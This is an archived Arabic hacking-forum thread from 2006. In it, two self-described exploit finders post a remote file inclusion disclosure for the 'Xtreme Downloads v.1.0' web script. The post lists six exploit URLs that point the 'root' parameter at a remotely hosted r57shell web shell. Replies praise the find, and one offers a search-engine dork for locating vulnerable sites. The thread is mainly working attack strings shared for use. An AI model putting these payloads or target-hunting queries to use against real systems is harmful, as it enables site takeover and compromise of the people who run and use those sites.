المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : file include exploits in Xtreme Downloads v.1.0 بتوقيع sweet-devil&black-code


Black-Code
06-06-2006, 01:57
بسم الله الرحمن الرحيم ..

اليوم نقدم لكم اخر ثغرة لي انا واخي سويت ديفيل واليكم نص تسجيلها في مواقع السيكيورتي ..
|31|



Multiple file include exploits in Xtreme Downloads v.1.0

script type : Xtreme Downloads v.1.0
bug found by : sweet-devil & black-code
team : site-down
type : file include

################################################## ##

exploits :


download.php

http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt?

manager.php

http://www.example.com/path/manager.php?root=http://yoursite/r57shell.txt?

/admin/scripts/category.php?

http://www.example.com/path/admin/scripts/category.php?root=http://yoursite/r57shell.txt?

/includes/add_allow.php?

http://www.example.com/path/includes/add_allow.php?root=http://yoursite/r57shell.txt?

/admin/index.php

http://www.example.com/path/admin/index.php?root=http://yoursite/r57shell.txt?

/admin/login.php

http://www.example.com/path/admin/admin/login.php?root=http://yoursite/r57shell.txt?

################################################## ##


#######################
emails:

gamr-14@hotmail.com & black-cod3@hotmail.com
#######################


All my respect to our friends , lezr.com , g123g.net


done .. peace

***********************************************
وفي النهاية تقبلوا تحياتنا .. سلامي للجميع

MazaGi
06-06-2006, 02:21
مشكووووووووور ع الثغره ياقوي


ننتظر ثغرات جديده

spy_xhahax
06-06-2006, 10:37
مشكوووووووووووووووور ياقلبي

حليب السعوديه
06-06-2006, 12:32
يا اخي جبتلي صداع

كل يوم مكتشف ثغره و كل دقيقه متكتشف ثغره ايه ما فيه رحمه بالعالم ؟؟؟

خليتو ايش للامريكان علشان يكتشفوا ؟
اخوك xXx

متكي ورا الشمس
06-06-2006, 06:08
مبرووووك والله ,,

وعقبال الاقوى,,,

بالتوفيق

بورير
06-06-2006, 06:51
مشكور أخي على على الإكتشاااف ...

لكن للأسف الثغرة غير منتشرة وبالتالي ---> أضعف من الثغرات الأخرى نوعا ما ...

علما أني بحث في الغوغل وفي محركات أخرى ولم أجد أي شل ...

والشباب يكتبوا هيك مثلا :

Powered by Xtreme"inurl:/admin/index.php"

ويشوفوا ويبحثوا ...

وعلى كل هذا رأيي ...

-----------
إحتــرامــــــــي
-----------

Black-Code
08-06-2006, 12:21
مشكوورين شباب علي المرور ..

اخي متكي الله يبارك فيك ..

اخي بورير .. ليس من الضروري ان تجد لها مواقع كثيرة .. او من الممكن انك لم تبحث جيدا ..

سلامي للجميع